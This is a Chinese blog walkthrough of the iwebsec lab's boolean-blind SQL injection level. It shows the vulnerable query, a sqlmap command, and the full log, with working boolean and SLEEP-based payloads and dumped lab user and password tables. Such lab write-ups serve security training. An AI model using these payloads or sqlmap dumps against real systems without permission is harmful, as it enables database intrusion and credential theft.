• iwebsec靶场 SQL注入漏洞通关笔记3- bool注入(布尔型盲注)

     系列文章目录

    iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客

    iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)_mooyuan的博客-CSDN博客

    前言

    iwebsec靶场的SQL注入漏洞的第03关bool注入漏洞渗透,

    一、源码分析

    如下所示,SQL语句为$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";

    可知这是一个普通的数字型注入,并且没有对参数id做任何过滤

    不过在输出内容中可以得知仅sql查询成功时有正确输出welcome to iwebsec!!!

    当sql查询结果错误时显示1

    也就是说这属于布尔型注入,形象的描述就是当前页面只会点头或者摇头,仅有这两种表达方式,也就是布尔的是与否两者形式,故而是布尔注入。

    二、sqlmap渗透

    1.注入命令

    sqlmap -u http://192.168.71.151/sqli/01.php?id=1  --current-db --dump --batch

    如下所示渗透成功,发现其存在布尔型盲注漏洞

    2.完整交互过程

    1. kali@kali:~$ sqlmap -u http://192.168.71.151/sqli/03.php?id=1 --current-db --dump --batch 
    2.         ___
    3.        __H__                                                                                                                                                                                                                               
    4.  ___ ___[']_____ ___ ___  {1.5.11#stable}                                                                                                                                                                                                  
    5. |_ -| . [)]     | .'| . |                                                                                                                                                                                                                  
    6. |___|_  [(]_|_|_|__,|  _|                                                                                                                                                                                                                  
    7.       |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                               
    8.  
    9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    11. [*] starting @ 22:18:11 /2022-11-24/
    13. [22:18:11] [INFO] testing connection to the target URL
    14. [22:18:11] [INFO] checking if the target is protected by some kind of WAF/IPS
    15. [22:18:11] [INFO] testing if the target URL content is stable
    16. [22:18:11] [INFO] target URL content is stable
    17. [22:18:11] [INFO] testing if GET parameter 'id' is dynamic
    18. [22:18:11] [WARNING] GET parameter 'id' does not appear to be dynamic
    19. [22:18:11] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
    20. [22:18:11] [INFO] testing for SQL injection on GET parameter 'id'
    21. [22:18:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    22. [22:18:12] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="welcome to iwebsec!!!")
    23. [22:18:12] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
    24. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    25. for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
    26. [22:18:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
    27. [22:18:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
    28. [22:18:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
    29. [22:18:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
    30. [22:18:12] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
    31. [22:18:12] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
    32. [22:18:12] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
    33. [22:18:12] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
    34. [22:18:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    35. [22:18:12] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    36. [22:18:12] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    37. [22:18:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    38. [22:18:12] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    39. [22:18:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    40. [22:18:12] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    41. [22:18:12] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
    42. [22:18:12] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
    43. [22:18:12] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
    44. [22:18:12] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
    45. [22:18:12] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
    46. [22:18:12] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
    47. [22:18:12] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
    48. [22:18:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
    49. [22:18:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
    50. [22:18:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
    51. [22:18:12] [INFO] testing 'Generic inline queries'
    52. [22:18:12] [INFO] testing 'MySQL inline queries'
    53. [22:18:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
    54. [22:18:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
    55. [22:18:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
    56. [22:18:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
    57. [22:18:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
    58. [22:18:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
    59. [22:18:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
    60. [22:18:22] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
    61. [22:18:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    62. [22:18:22] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    63. [22:18:22] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    64. [22:18:22] [INFO] target URL appears to have 3 columns in query
    65. do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
    66. injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
    67. [22:18:22] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
    68. [22:18:22] [INFO] target URL appears to be UNION injectable with 3 columns
    69. injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
    70. [22:18:22] [INFO] testing 'MySQL UNION query (29) - 1 to 20 columns'
    71. [22:18:22] [INFO] testing 'MySQL UNION query (29) - 21 to 40 columns'
    72. [22:18:23] [INFO] testing 'MySQL UNION query (29) - 41 to 60 columns'
    73. [22:18:23] [INFO] testing 'MySQL UNION query (29) - 61 to 80 columns'
    74. [22:18:23] [INFO] testing 'MySQL UNION query (29) - 81 to 100 columns'
    75. [22:18:23] [INFO] checking if the injection point on GET parameter 'id' is a false positive
    76. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
    77. sqlmap identified the following injection point(s) with a total of 255 HTTP(s) requests:
    78. ---
    79. Parameter: id (GET)
    80.     Type: boolean-based blind
    81.     Title: AND boolean-based blind - WHERE or HAVING clause
    82.     Payload: id=1 AND 6892=6892
    84.     Type: time-based blind
    85.     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    86.     Payload: id=1 AND (SELECT 2146 FROM (SELECT(SLEEP(5)))rHLa)
    87. ---
    88. [22:18:23] [INFO] the back-end DBMS is MySQL
    89. web server operating system: Linux CentOS 6
    90. web application technology: Apache 2.2.15, PHP 5.2.17
    91. back-end DBMS: MySQL >= 5.0.12
    92. [22:18:23] [INFO] fetching current database
    93. [22:18:23] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    94. [22:18:23] [INFO] retrieved: iwebsec
    95. current database: 'iwebsec'
    96. [22:18:23] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
    97. [22:18:23] [INFO] fetching current database
    98. [22:18:23] [INFO] fetching tables for database: 'iwebsec'
    99. [22:18:23] [INFO] fetching number of tables for database 'iwebsec'
    100. [22:18:23] [INFO] retrieved: 4
    101. [22:18:23] [INFO] retrieved: sqli
    102. [22:18:23] [INFO] retrieved: user
    103. [22:18:23] [INFO] retrieved: users
    104. [22:18:24] [INFO] retrieved: xss
    105. [22:18:24] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
    106. [22:18:24] [INFO] retrieved: 4
    107. [22:18:24] [INFO] retrieved: id
    108. [22:18:24] [INFO] retrieved: username
    109. [22:18:24] [INFO] retrieved: password
    110. [22:18:24] [INFO] retrieved: email
    111. [22:18:24] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
    112. [22:18:24] [INFO] fetching number of entries for table 'sqli' in database 'iwebsec'
    113. [22:18:24] [INFO] retrieved: 7
    114. [22:18:24] [INFO] retrieved: user1@iwebsec.com
    115. [22:18:25] [INFO] retrieved: 1
    116. [22:18:25] [INFO] retrieved: pass1
    117. [22:18:25] [INFO] retrieved: user1
    118. [22:18:25] [INFO] retrieved: user2@iwebsec.com
    119. [22:18:26] [INFO] retrieved: 2
    120. [22:18:26] [INFO] retrieved: pass2
    121. [22:18:26] [INFO] retrieved: user2
    122. [22:18:26] [INFO] retrieved: user3@iwebsec.com
    123. [22:18:27] [INFO] retrieved: 3
    124. [22:18:27] [INFO] retrieved: pass3
    125. [22:18:27] [INFO] retrieved: user3
    126. [22:18:27] [INFO] retrieved: user4@iwebsec.com
    127. [22:18:28] [INFO] retrieved: 4
    128. [22:18:28] [INFO] retrieved: admin
    129. [22:18:28] [INFO] retrieved: admin
    130. [22:18:28] [INFO] retrieved: 123@123.com
    131. [22:18:28] [INFO] retrieved: 5
    132. [22:18:28] [INFO] retrieved: 123
    133. [22:18:29] [INFO] retrieved: 123
    134. [22:18:29] [INFO] retrieved: 1234@123.com
    135. [22:18:29] [INFO] retrieved: 6
    136. [22:18:29] [INFO] retrieved: 123
    137. [22:18:29] [INFO] retrieved: ctfs' or updatexml(1,concat(0x7e,(version())),0)#
    138. [22:18:31] [INFO] retrieved: iwebsec02@iwebsec.com
    139. [22:18:32] [INFO] retrieved: 7
    140. [22:18:32] [INFO] retrieved: 123456
    141. [22:18:32] [INFO] retrieved: iwebsec' or updatexml(1,concat(0x7e,(version())),0)#
    142. Database: iwebsec
    143. Table: sqli
    144. [7 entries]
    145. +----+-----------------------+----------+------------------------------------------------------+
    146. | id | email                 | password | username                                             |
    147. +----+-----------------------+----------+------------------------------------------------------+
    148. | 1  | user1@iwebsec.com     | pass1    | user1                                                |
    149. | 2  | user2@iwebsec.com     | pass2    | user2                                                |
    150. | 3  | user3@iwebsec.com     | pass3    | user3                                                |
    151. | 4  | user4@iwebsec.com     | admin    | admin                                                |
    152. | 5  | 123@123.com           | 123      | 123                                                  |
    153. | 6  | 1234@123.com          | 123      | ctfs' or updatexml(1,concat(0x7e,(version())),0)#    |
    154. | 7  | iwebsec02@iwebsec.com | 123456   | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
    155. +----+-----------------------+----------+------------------------------------------------------+
    157. [22:18:33] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
    158. [22:18:33] [INFO] fetching columns for table 'user' in database 'iwebsec'
    159. [22:18:33] [INFO] retrieved: 3
    160. [22:18:34] [INFO] retrieved: id
    161. [22:18:34] [INFO] retrieved: username
    162. [22:18:34] [INFO] retrieved: password
    163. [22:18:34] [INFO] fetching entries for table 'user' in database 'iwebsec'
    164. [22:18:34] [INFO] fetching number of entries for table 'user' in database 'iwebsec'
    165. [22:18:34] [INFO] retrieved: 3
    166. [22:18:34] [INFO] retrieved: 1
    167. [22:18:34] [INFO] retrieved: pass1
    168. [22:18:35] [INFO] retrieved: user1
    169. [22:18:35] [INFO] retrieved: 2
    170. [22:18:35] [INFO] retrieved: pass2
    171. [22:18:35] [INFO] retrieved: user2
    172. [22:18:35] [INFO] retrieved: 3
    173. [22:18:35] [INFO] retrieved: pass3
    174. [22:18:35] [INFO] retrieved: user3
    175. Database: iwebsec
    176. Table: user
    177. [3 entries]
    178. +----+----------+----------+
    179. | id | password | username |
    180. +----+----------+----------+
    181. | 1  | pass1    | user1    |
    182. | 2  | pass2    | user2    |
    183. | 3  | pass3    | user3    |
    184. +----+----------+----------+
    186. [22:18:36] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
    187. [22:18:36] [INFO] fetching columns for table 'xss' in database 'iwebsec'
    188. [22:18:36] [INFO] retrieved: 2
    189. [22:18:36] [INFO] retrieved: id
    190. [22:18:36] [INFO] retrieved: name
    191. [22:18:36] [INFO] fetching entries for table 'xss' in database 'iwebsec'
    192. [22:18:36] [INFO] fetching number of entries for table 'xss' in database 'iwebsec'
    193. [22:18:36] [INFO] retrieved: 5
    194. [22:18:36] [INFO] retrieved: 1
    195. [22:18:36] [INFO] retrieved: iwebsec
    196. [22:18:36] [INFO] retrieved: 5
    197. [22:18:36] [INFO] retrieved: 
    198. [22:18:38] [INFO] retrieved: 6
    199. [22:18:38] [INFO] retrieved: 
    200. [22:18:39] [INFO] retrieved: 7
    201. [22:18:39] [INFO] retrieved: 
    202. [22:18:40] [INFO] retrieved: 8
    203. [22:18:40] [INFO] retrieved: 
    204. Database: iwebsec
    205. Table: xss
    206. [5 entries]
    207. +----+------------------------------------+
    208. | id | name                               |
    209. +----+------------------------------------+
    210. | 1  | iwebsec                            |
    211. | 5  |  |
    212. | 6  |  |
    213. | 7  |  |
    214. | 8  |                  |
    215. +----+------------------------------------+
    217. [22:18:41] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
    218. [22:18:41] [INFO] fetching columns for table 'users' in database 'iwebsec'
    219. [22:18:41] [INFO] retrieved: 3
    220. [22:18:41] [INFO] retrieved: username
    221. [22:18:42] [INFO] retrieved: password
    222. [22:18:42] [INFO] retrieved: role
    223. [22:18:42] [INFO] fetching entries for table 'users' in database 'iwebsec'
    224. [22:18:42] [INFO] fetching number of entries for table 'users' in database 'iwebsec'
    225. [22:18:42] [INFO] retrieved: 1
    226. [22:18:42] [INFO] retrieved: mall123mall
    227. [22:18:43] [INFO] retrieved: admin
    228. [22:18:43] [INFO] retrieved: orange
    229. Database: iwebsec
    230. Table: users
    231. [1 entry]
    232. +-------+-------------+----------+
    233. | role  | password    | username |
    234. +-------+-------------+----------+
    235. | admin | mall123mall | orange   |
    236. +-------+-------------+----------+
    238. [22:18:44] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
    239. [22:18:44] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
    240. [22:18:44] [WARNING] your sqlmap version is outdated
    242. [*] ending @ 22:18:44 /2022-11-24/

    总结

    通过源码再来分析下布尔型SQL注入重点内容:

    (1)闭合方式是什么?iwebsec的第03关关卡为数字型

    (2)注入类别是什么?这部分通过源码分析与手注很容易判断出是布尔型注入

    (3)是否过滤了关键字?很明显通过源码,iwebsec的布尔型关卡无过滤任何信息

    了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的第3关bool注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。

  • 相关阅读:
    媒介盒子:品牌宣传的内容输出逻辑是什么
    mockito
    Math.abs一定大于等于0吗?
    深度解析Java JDK 1.8中Stream流的源码实现:带你探寻数据流的奥秘
    传智健康_第5章 预约管理-预约设置
    VsCode Ctrl+.修复无效
    MongoDB副本集成员如何复制新数据
    java毕业设计教师教学质量评价管理Mybatis+系统+数据库+调试部署
    前端基础之《NodeJS(2)—模块化》
    LeetCode(力扣)17. 电话号码的字母组合Python
  • 原文地址:https://blog.csdn.net/mooyuan/article/details/128034663